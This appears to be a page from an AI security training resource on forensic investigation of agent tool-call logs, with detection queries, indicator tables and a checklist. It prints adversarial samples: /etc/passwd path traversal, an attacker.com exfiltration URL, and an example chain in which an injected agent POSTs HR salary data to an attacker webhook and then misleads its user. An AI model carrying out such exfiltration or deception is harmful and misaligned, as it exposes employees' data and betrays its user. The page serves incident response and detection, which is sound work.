Tool Call Forensics
Forensic investigation of agent tool calls: detecting unauthorized tool usage, analyzing parameter manipulation evidence, identifying exfiltration traces, and reconstructing agent action chains.
Tool Call Forensics
When an AI agent has access to tools -- search engines, databases, APIs, code executors, file systems, email senders -- the blast radius of an incident extends far beyond the model's text outputs. A compromised agent can read sensitive files, exfiltrate data through HTTP requests, execute arbitrary code, or take actions in external systems that are difficult or impossible to reverse. This page covers forensic investigation of tool call logs.
Tool Call Evidence Structure
A forensically useful tool call log entry captures the complete context of each invocation.
{
"call_id": "tc_001",
"parent_request_id": "req_abc123",
"timestamp": "2026-03-15T14:33:12Z",
"tool_name": "database_query",
"parameters": {
"query": "SELECT * FROM customers WHERE region = 'EU'",
"database": "production_crm"
},
"result": {
"rows_returned": 1847,
"columns": ["name", "email", "phone", "address"],
"truncated": true
},
"authorization": {
"user_id": "user_42",
"permissions": ["read:customers"],
"policy_decision": "allow"
},
"execution_time_ms": 234,
"model_reasoning": "User asked for EU customer contact information for the quarterly report."
}Detecting Unauthorized Tool Usage
Legitimate vs. Adversarial Tool Patterns
| Indicator | Legitimate Use | Adversarial Use |
|---|---|---|
| Tool selection | Tools relevant to the user's stated task | Tools unrelated to the conversation topic |
| Parameter scope | Narrow, specific queries | Broad, wildcard, or exploratory queries |
| Data volume | Proportional to the user's request | Disproportionately large data retrieval |
| Access pattern | Consistent with user's role and permissions | Exceeds the user's normal data access scope |
| Timing | Single call or small chain per user request | Rapid sequential calls iterating through resources |
| Result usage | Results incorporated into a helpful response | Results summarized/encoded for extraction |
Unauthorized Tool Detection Queries
-- Detect tool calls that don't match user conversation topic
-- Requires topic tagging on conversations
SELECT
tc.call_id,
tc.tool_name,
tc.parameters,
tc.timestamp,
c.topic_classification,
tc.user_id
FROM tool_calls tc
JOIN conversations c ON tc.parent_request_id = c.request_id
WHERE tc.tool_name NOT IN (
SELECT expected_tool
FROM topic_tool_mapping
WHERE topic = c.topic_classification
)
ORDER BY tc.timestamp DESC;
-- Detect unusual tool call volume per session
SELECT
session_id,
user_id,
COUNT(*) AS tool_calls,
COUNT(DISTINCT tool_name) AS distinct_tools,
ARRAY_AGG(DISTINCT tool_name) AS tools_used
FROM tool_calls
WHERE timestamp > NOW() - INTERVAL '24 hours'
GROUP BY session_id, user_id
HAVING COUNT(*) > 20
ORDER BY tool_calls DESC;Parameter Manipulation Evidence
Attackers manipulate tool call parameters to expand access beyond what the model would normally request. Look for these patterns:
Database Query Manipulation
| Normal Pattern | Adversarial Pattern | Evidence |
|---|---|---|
WHERE id = 42 | WHERE 1=1 or WHERE id > 0 | Broadened query scope to return all records |
SELECT name, email | SELECT * | Requested all columns including sensitive fields |
LIMIT 10 | No LIMIT or LIMIT 100000 | Removed pagination to extract bulk data |
WHERE department = 'sales' | Removed department filter | Cross-departmental access |
File System Manipulation
| Normal Pattern | Adversarial Pattern | Evidence |
|---|---|---|
read_file("/app/docs/help.md") | read_file("/etc/passwd") | Path traversal outside application scope |
list_directory("/app/uploads/user_42/") | list_directory("/") | Directory enumeration from root |
read_file only | write_file or execute | Privilege escalation through tool switching |
API Call Manipulation
| Normal Pattern | Adversarial Pattern | Evidence |
|---|---|---|
GET /api/user/me | GET /api/users | Endpoint modification to access other users |
| Standard headers | Added Authorization headers | Credential injection in API calls |
| Application-internal URLs | External URLs (https://attacker.com) | Data exfiltration via outbound HTTP |
Exfiltration Traces
Data exfiltration through agent tool calls follows identifiable patterns.
Exfiltration Channels
| Channel | How It Works | Detection |
|---|---|---|
| Direct output | Model includes extracted data in its response to the user | Content analysis of model outputs |
| Outbound HTTP | Agent calls an external URL with extracted data in parameters | Monitor for external URL tool calls |
| Email/messaging | Agent sends data via email or messaging tool | Audit all send/share tool invocations |
| File write | Agent writes data to a user-accessible location | Monitor write tool calls and output paths |
| Code execution | Agent runs code that makes network requests | Analyze executed code for network operations |
| Encoded output | Agent encodes data (Base64, hex) and presents as normal output | Detect encoded content in outputs |
Exfiltration Chain Example
Step 1: User prompt with indirect injection triggers reconnaissance
Tool: search_internal_docs("employee salary data")
Result: Found 3 documents in HR knowledge base
Step 2: Model retrieves sensitive documents
Tool: read_document(doc_id="hr_salary_2026")
Result: Full salary data for 200 employees
Step 3: Model exfiltrates via outbound HTTP
Tool: web_request(
url="https://webhook.site/attacker-id",
method="POST",
body="<encoded salary data>"
)
Result: HTTP 200 OK
Step 4: Model presents innocuous response to user
Assistant: "I found some general information about compensation..."
Identify outbound data flows
Search tool call logs for any tools that send data to external destinations: HTTP requests, email sends, file uploads, webhook calls. These are the highest-priority exfiltration risks.
Trace data provenance
For each outbound flow, trace backward through the tool call chain to identify what data the model had access to. Follow the
parent_request_idchain to reconstruct the full sequence.Quantify data exposure
Determine the volume and sensitivity of data that passed through the exfiltration channel. Calculate the number of records, data types, and affected individuals.
Check for obfuscation
Examine the data sent through the exfiltration channel for encoding or transformation. Attackers may instruct the model to encode data before sending to avoid content filters.
Agent Action Chain Reconstruction
Reconstructing the complete sequence of agent actions reveals the full attack narrative.
Chain Visualization
Build a directed graph of tool calls within a session:
[User Message] → [Model Reasoning] → [Tool Call 1: search]
↓
[Tool Result 1]
↓
[Model Reasoning] → [Tool Call 2: read_file]
↓
[Tool Result 2]
↓
[Model Reasoning] → [Tool Call 3: web_request]
↓
[Tool Result 3]
↓
[Model Response to User]
Key Questions for Chain Analysis
| Question | What It Reveals |
|---|---|
| What triggered the first tool call? | Whether the attack originated from user input or injected context |
| Did the model's reasoning justify each tool call? | Whether the model was manipulated or acting within normal parameters |
| Were tool results fed back into subsequent tool calls? | How information propagated through the agent's action chain |
| Did any tool call exceed the user's authorization scope? | Whether permission boundaries were violated |
| What data was available to the model when it generated its final response? | The maximum possible data exposure |
Tool Call Forensic Checklist
Use this checklist when investigating agent tool calls during an incident:
| # | Check | Status |
|---|---|---|
| 1 | List all tool calls in the incident time window | |
| 2 | Flag tool calls not matching the conversation topic | |
| 3 | Check for parameter manipulation (wildcard queries, path traversal, scope expansion) | |
| 4 | Identify all outbound data flows (HTTP, email, file write) | |
| 5 | Trace data provenance for each outbound flow | |
| 6 | Compare model reasoning with actual tool parameters | |
| 7 | Check authorization decisions for each tool call | |
| 8 | Identify the injection source that triggered adversarial tool usage | |
| 9 | Quantify data exposure volume and sensitivity | |
| 10 | Document the complete tool call chain with timestamps |
Related Topics
- Agent & Agentic Exploitation -- understanding agent attack techniques
- Prompt Log Forensics -- analyzing the prompts that triggered tool calls
- Data Exfiltration IR Playbook -- responding to confirmed exfiltration
- Evidence Preservation -- preserving tool call evidence
References
- "Compromising Real-World LLM-Integrated Applications with Indirect Prompt Injection" - Greshake et al. (2023) - Foundational research on agent exploitation via indirect injection
- "OWASP Top 10 for LLM Applications: LLM07 - Insecure Plugin Design" - OWASP Foundation (2025) - Tool/plugin security risks in AI agents
- "MITRE ATLAS Technique T0054: LLM Plugin Compromise" - MITRE Corporation (2025) - Standardized technique for agent tool abuse
An agent's tool call log shows it searched for 'salary data', read an HR document, then made an HTTP POST to an external webhook. The model's reasoning for the HTTP call says 'sending the report summary to the user's webhook.' What should you investigate first?